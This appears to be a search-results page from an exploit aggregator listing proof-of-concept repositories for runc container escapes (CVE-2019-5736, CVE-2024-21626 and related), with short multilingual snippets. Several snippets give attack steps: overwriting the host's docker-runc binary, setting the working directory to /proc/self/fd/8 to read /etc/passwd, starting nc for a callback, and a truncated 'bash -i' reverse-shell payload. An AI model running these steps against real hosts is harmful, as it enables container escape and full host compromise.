Lucene search
+L

2280 matches found

Kitploit
Kitploit
added 2026/08/27 4:30 a.m.2 views

cve-2019-5736-poc

Per eseguire: 1. modifica il comando poc in stage2.c 2. costruisci docker docker build -t cve . 3. esegui docker docker run -d cve /bin/bash -c "tail -f /dev/null" 4. fai il backup di docker-runc cp /usr/bin/docker-runc /usr/bin/docker-runc.bak 5. docker exec -it docker-id /bin/bash 6. nel docker...

9.3CVSS6.7AI score0.98452EPSS
SaveExploits34
Kitploit
Kitploit
added 2026/08/27 4:14 a.m.7 views

CVE-2026-D0cker

CVE-2026-Pending: Container-Escape über die runC-maskPaths-Sicherheitslücke Schweregrad: Kritisch CVSS 9.8 Komponente: opencontainers/runc libcontainer Sicherheitslückentyp: CWE-59: Unzulässige Linkauflösung vor Dateizugriff 'Link Following' 🚨 Zusammenfassung Eine kritische Sicherheitslücke beste...

5.5AI score
SaveExploits0
Kitploit
Kitploit
added 2026/08/27 4:09 a.m.3 views

CVE-2024-21626

CVE-2024-21626 Exploit répertoire de travail docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm Il est important de mettre -w /proc/self/fd/8\ Accédez au système de fichiers de l'hôte avec cat ../../../../../../../../../etc/passwd à l'intérieur du conteneur Exploit Symli...

8.6CVSS6.6AI score0.18087EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/08/27 3:57 a.m.2 views

CVE-2026-31431-Container-Escape

CVE-2026-31431 Container Escape Container-Escape über runC...

7.8CVSS5.3AI score0.99907EPSS
SaveExploits238
Kitploit
Kitploit
added 2026/08/27 3:26 a.m.2 views

CVE-2019-5736

Utilizzo Modifica HOST all'interno di payload.c, compila con make. Avvia nc ed esegui pwn.sh all'interno del container. Note Questo exploit è distruttivo: sovrascriverà il binario /usr/bin/docker-runc sull'host con il payload. Sovrascriverà anche /bin/sh all'interno del container. Testato solo su...

9.3CVSS6.7AI score0.98452EPSS
SaveExploits34References1
Kitploit
Kitploit
added 2026/08/27 3:05 a.m.2 views

CVE-2024-21626-PoC

CVE-2024-21626 Root-Ursache & Proof-of-Code Wie verwendet man poc-autoplay? root@kitploit: make install make uninstall 1. Root-Ursache In runc v1.1.11 und niedriger entsteht diese Schwachstelle dadurch, dass beim Öffnen des Host-Verzeichnisses /sys/fs/cgroup zur Einrichtung der cgroup der...

8.6CVSS6.6AI score0.18087EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/08/27 3:02 a.m.1 views

proxmox-lxc-docker-fix

Correzione AppArmor per LXC Proxmox per Docker/Contenitori Soluzione alternativa per CVE-2025-52881 : Risolve il malfunzionamento di Docker, Podman e runtime dei contenitori nei contenitori LXC di Proxmox causato dall'incompatibilità di AppArmor con runc 1.2.7+/1.3.2+ 🚨 Il Problema Gli...

7.5CVSS7.8AI score0.00516EPSS
SaveExploits1References1
Kitploit
Kitploit
added 2026/08/27 2:40 a.m.2 views

CVE-2024-21626

CVE-2024-21626 POC Требования runc 1.1.0 = 1.1.11 Установка уязвимой среды Разверните виртуальную машину с Ubuntu 20.04 и загрузите Docker, следуя их руководству root@kitploit: https://docs.docker.com/engine/install/ubuntu/ Замените пропатченную версию 'runc' в Docker на уязвимую Загрузите уязвим...

8.6CVSS6.6AI score0.18087EPSS
SaveExploits18References1
Kitploit
Kitploit
added 2026/08/27 12:59 a.m.2 views

cve_2019-5736-PoC

CVE-2019-5736 PoC 此仓库包含一个基于 C 语言的 PoC 漏洞利用,针对 CVE-2019-5736。 该漏洞允许恶意的 Docker 容器覆盖主机的 runc 二进制文件,并以 root 权限在主机上执行任意命令,从而完全攻陷主机系统。 灵感来源于 Frichetten 的原始基于 Go 的 PoC:Frichetten/CVE-2019-5736-PoC 免责声明 此代码仅供教育目的 。请勿在你没有所有权或测试许可的系统上运行。滥用可能导致法律后果。 目录 1. 项目结构 2. 环境搭建与安装 3. 使用方法 1. 项目结构 root@kitploit: . ├──...

9.3CVSS6.7AI score0.98452EPSS
SaveExploits34References1
Kitploit
Kitploit
added 2026/08/27 12:36 a.m.2 views

cve-2019-5737

Linux: docker build -t cve:linux - Dockerfile docker run cve:linux strings /usr/bin/docker-runc | tail -n 2 Windows: Get-Content Dockerfile | docker build -t cve:windows docker run cve:windows findstr /usr/bin/docker-runc | tail -n 2...

7.5CVSS7.1AI score0.16184EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/08/27 12:32 a.m.2 views

CVE-2024-21626-old-docker-versions

Containeraustritt-Schwachstelle in alten runc-Komponenten CVE-2024-21626 Während meiner Analyse zu CVE-2024-21626 habe ich festgestellt, dass andere ältere Docker-Komponenten anfällig für fd-Leaks sind was in der Sicherheitswarnung GHSA-xr7r-f8xq-vfvv nicht erwähnt wird. Lesen Sie meinen...

8.6CVSS6.6AI score0.18087EPSS
SaveExploits18References3
Kitploit
Kitploit
added 2026/08/26 11:00 p.m.2 views

cve-2024-21626-runc-1.1.11-escape

CVE-2024-21626 - runc Vasi che perdono Panoramica Campo| Dettaglio ---|--- CVE| CVE-2024-21626 Componente affetto| runc ≤ 1.1.11 Classe di vulnerabilità| Fuga dal contenitore tramite perdita di file descriptor Soprannome| Vasi che perdono Causa principale runc perde un file descriptor interno...

8.6CVSS6.6AI score0.18087EPSS
SaveExploits18References1
Kitploit
Kitploit
added 2026/08/26 10:06 p.m.2 views

POC-CVE-2019-5736

RunC-CVE-2019-5736 Video : https://bit.ly/2WqvILb Blogbeitrag : www.idealhax.blogspot.com/2020/05/breaking-out-of-docker-via-runc.html Hier möchte ich erwähnen, dass der ursprüngliche Entwickler dieses Exploits Yuval Avrahami von Twistlock Labs ist. Ausführen der POCs Beachten Sie, dass das...

9.3CVSS6.8AI score0.98452EPSS
SaveExploits34
Kitploit
Kitploit
added 2026/08/26 10:06 p.m.3 views

CVE-2019-5736-PoC

उपयोग PoC उस परिदृश्य के लिए बनाया गया था जहाँ पीड़ित उदाहरण के लिए docker exec sh निष्पादित कर रहा है। एक्सप्लॉइट चलाने से पहले कंटेनर फ़ाइल सिस्टम में sh बाइनरी को ओवरराइट करना आवश्यक है: root@kitploit: printf '!/proc/self/exe' /bin/sh उसके बाद, जब पीड़ित exec कमांड निष्पादित करता है, तो होस्ट...

9.3CVSS6.7AI score0.98452EPSS
SaveExploits34
Kitploit
Kitploit
added 2026/08/26 9:31 p.m.3 views

cve-2019-5736-poc

CVE-2019-5736 Proof of Concept Questo aggiunge una stringa al binario runc dell'host. Porta il tuo payload vedi stage2.c. Per eseguire: docker build -t cve . docker run cve strings /usr/bin/docker-runc | tail -n 2...

9.3CVSS6.7AI score0.98452EPSS
SaveExploits34
Kitploit
Kitploit
added 2026/08/26 9:28 p.m.1 views

CVE-2024-21626-POC

CVE-2024-21626-POC Istruzioni per l'uso Solo per uso educativo/di ricerca. Qualsiasi azione non correlata a scopi educativi/di ricerca è a proprio rischio. Utilizzo root@kitploit: docker build . -t cve-2024-21626 docker run -it --rm cve-2024-21626 bash /poc.sh 另起一个terminal /bin/bash.copy Nota I...

8.6CVSS6.6AI score0.18087EPSS
SaveExploits18References2
Kitploit
Kitploit
added 2026/08/26 9:20 p.m.2 views

CVE-2019-5736

Uso Edite HOST dentro de payload.c, compile com make. Inicie nc e execute pwn.sh dentro do contêiner. Notas Este exploit é destrutivo: ele sobrescreverá o binário /usr/bin/docker-runc no host com o payload. Ele também sobrescreverá /bin/sh dentro do contêiner. Testado apenas no Debian 9. Nenhuma...

9.3CVSS6.8AI score0.98452EPSS
SaveExploits34References2
Kitploit
Kitploit
added 2026/08/26 9:11 p.m.2 views

CVE-2024-21626-demo

CVE-2024-21626-demo Demo per il LT del Container Runtime Meetup 5. Scopo: diffondere la consapevolezza del pericolo di attacco secondo le informazioni pubbliche; l'abuso è severamente vietato. Slides Container Runtime Meetup 5 〜Quella immagine, ti fidi davvero?〜 Ottenere la root dell'host con...

8.6CVSS6.6AI score0.18087EPSS
SaveExploits18References2
Kitploit
Kitploit
added 2026/08/26 8:59 p.m.4 views

CVE-2019-5736-PoC-2

Panoramica Una versione dell'exploit del seguente repository resa eseguibile come immagine Docker. https://github.com/feexd/pocs Utilizzo Creazione dell'immagine root@kitploit: $ git clone https://github.com/k-onishi/CVE-2019-5736-PoC $ cd CVE-2019-5736-PoC $ make $ sudo docker build -t poc...

9.3CVSS6.8AI score0.98452EPSS
SaveExploits34References1
Kitploit
Kitploit
added 2026/08/26 8:35 p.m.3 views

CVE-2019-5736

🖥️ -h3x0v3rl0rd- ️⃣ CVE-2019-5736 Verwendung : Die Maschine ist anfällig für CVE-2019-5736, befolgen Sie die Schritte im Runc-Exploit CVE-2019-5736. Laden Sie die Datei main.go herunter, ändern Sie die Payload in der Datei zu: root@kitploit: var payload = "!/bin/bash \n bash -i &...

9.3CVSS6.7AI score0.98452EPSS
SaveExploits34
Rows per page
Query Builder